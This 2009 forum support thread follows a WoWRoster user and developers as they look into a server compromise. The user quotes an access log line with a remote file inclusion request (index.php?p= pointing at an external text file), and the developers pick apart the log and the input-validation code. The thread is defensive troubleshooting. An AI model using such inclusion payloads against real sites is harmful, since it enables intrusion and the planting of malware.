Big issue!! trojan access

Requests, feedback, and general discussion about WoWRoster
DO NOT post topics about WoWRoster AddOns here!

Big issue!! trojan access

Postby maqjav » Fri May 08, 2009 3:32 pm

Hello guys.

The last month I've been atacked by someone accessing to my server by the roster.

I've been speaking with my server support and they sent me the log.
Here is the next:

89.108.73.84 - - [08/Apr/2009:17:26:49 +0200] "GET
/roster/index.php?p=http://www.wizard.com.br/id.txt??? HTTP/1.1" 200 153
herederosdethrall.es "-" "Mozilla
/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10)
Gecko/20050717 Firefox/1.0.6" "-"

Someone could access to my files and change all the "index.*" adding a hidden iframe. This iframe install a trojan in your system opening pop-ups continuesly in every web site you visit.
Not only that, if not that the pop-ups install new trojans more dangerous than the first one. My updated antivirus (McAffee Virusscan didn't detect them).
In fact I got a trojan who accessed to my router and changed my DNS servers at the end.
You can imagind what will happend if it happends in a house where they don't know about computers.

Be carefull with that and just find a solution for stop this ilegal access.
maqjav
WR.net Journeyman
WR.net Journeyman
 
Posts: 100
Joined: Wed Oct 18, 2006 2:38 pm

Re: Big issue!! trojan access

Postby zanix » Fri May 08, 2009 4:26 pm

Roster doesn't accept any characters for the p value from the URL except a-z 1-9 _ -

Roster dies and outputs an invalid message
Code: Select all
        // cmslink function to resolve SEO linking etc.
        
parse_params();

        
// --[ Determine the module request ]--
        
if( isset($_GET[ROSTER_PAGE]) && !empty($_GET[ROSTER_PAGE]) )
        {
            
$page $_GET[ROSTER_PAGE];
        }
        elseif( !
strpos($this->config['default_page'], '&') )
        {
            
$page $this->config['default_page'];
        }
        else
        {
            
// --[ Insert directly into GET request ]--
            
list($page$gets) = explode('&',$this->conf['default_page'],2);
            foreach( 
explode('&',$gets) as $get )
            {
                list(
$key$value) = explode('=',$get,2);
                
$_GET[$key] = $value;
            }
        }

        
define('ROSTER_PAGE_NAME'$page);

        
$this->pages explode('-'$page);

        
// --[ We only accept certain characters in our page ]--
        
if( preg_match('/[^a-zA-Z0-9_-]/'ROSTER_PAGE_NAME) )
        {
            
roster_die($this->locale->act['invalid_char_module'],$this->locale->act['roster_error']);
        }
 


I would like to know any more information you have about this
Read the Forum Rules, the WiKi, and Search before posting!
WoWRoster v2.1 - SigGen v0.3.3.523 - WoWRosterDF
User avatar
zanix
Admin
Admin
WoWRoster.net Dev Team
WoWRoster.net Dev Team
UA/UU Developer
UA/UU Developer
 
Posts: 5543
Joined: Mon Jul 03, 2006 8:29 am
Location: Idaho Falls, Idaho
Realm: Doomhammer (PvE) - US

Re: Big issue!! trojan access

Postby maqjav » Sat May 09, 2009 10:09 am

That's everything they could tell me.
I asked them about more information, but they only found that.

I was checking more information about this kind of attack, and it seems there is the possibility about you can get a trojan or something in your computers that can find your FTP passwords and access to your server infecting so many files as it want.

I will continue asking to my support for find more information about it.

Thank you anyway, I'll give you news.
maqjav
WR.net Journeyman
WR.net Journeyman
 
Posts: 100
Joined: Wed Oct 18, 2006 2:38 pm

Re: Big issue!! trojan access

Postby PleegWat » Sat May 09, 2009 12:16 pm

I can't find any code that is likely to cause the bug before the code zanix pasted. It could be an issue in the preg_match in zanix' snippet, in which case it is a PHP bug. For any others looking into this:

Code: Select all
89.108.73.84 - - [08/Apr/2009:17:26:49 +0200] "GET
/roster/index.php?p=http://www.wizard.com.br/id.txt??? HTTP/1.1" 200 153
herederosdethrall.es "-" "Mozilla
/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10)
Gecko/20050717 Firefox/1.0.6" "-"


The columns are, as far as I can make out:
IP address
Code: Select all
89.108.73.84


unknown
Code: Select all
-


unknown
Code: Select all
-


Timestamp
Code: Select all
[08/Apr/2009:17:26:49 +0200]


Method
Code: Select all
GET


URL path
Code: Select all
/roster/index.php?p=http://www.wizard.com.br/id.txt???

Note: The last 3 question marks are likely to be substituted control codes

Protocol
Code: Select all
HTTP/1.1


Return status
Code: Select all
200

Normal. Indicates the webserver thinks the request was completed successfully. Roster unfortunately does not exit with a special exit status in case of errors (Because IIS servers then substitute their own error page rather than the one the PHP script returns).

Unknown, but probably VHost
Code: Select all
herederosdethrall.es


unknown
Code: Select all
-


User-Agent
Code: Select all
Mozilla /5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6

Suggests an ancient firefox (1.0.6) on a Mac. Likely to be faked. I haven't checked if that firefox version really returns that user agent.

unknown
Code: Select all
-



I'm not sure what the first two or the last dash mean. The one between vhost and user agent I suspect to be referer, from my own webserver logs.
User avatar
PleegWat
WoWRoster.net Dev Team
WoWRoster.net Dev Team
 
Posts: 1636
Joined: Tue Jul 04, 2006 1:43 pm

Re: Big issue!! trojan access

Postby PleegWat » Sat May 09, 2009 12:26 pm

Oh, and can you please post:

- OS, with version
- HTTP server, with version
You can find this information in rosterdiag under 'Basic server info'

- PHP version
- Whether the safe_mode, open_basedir, allow_url_fopen, and file_upload settings are on or off.
You can find this information in rosterdiag under 'PHP Settings'
I <3 /bin/bash
User avatar
PleegWat
WoWRoster.net Dev Team
WoWRoster.net Dev Team
 
Posts: 1636
Joined: Tue Jul 04, 2006 1:43 pm

Re: Big issue!! trojan access

Postby maqjav » Sat May 09, 2009 9:12 pm

Here it is...

Basic Server Info
OS Linux infong 2.4 #1 SMP Tue Dec 18 22:34:10 UTC 2007 i686 GNU/Linux
Server Software Apache
MySQL Version 5.0.67-log

PHP Settings
PHP Version 5.2.9
PHP API Type cgi
safe_mode Off
open_basedir Off
allow_url_fopen Off
file_uploads On
upload_max_filesize 20M
maqjav
WR.net Journeyman
WR.net Journeyman
 
Posts: 100
Joined: Wed Oct 18, 2006 2:38 pm


Return to General Support & Feedback

Who is online

Users browsing this forum: No registered users and 0 guests

cron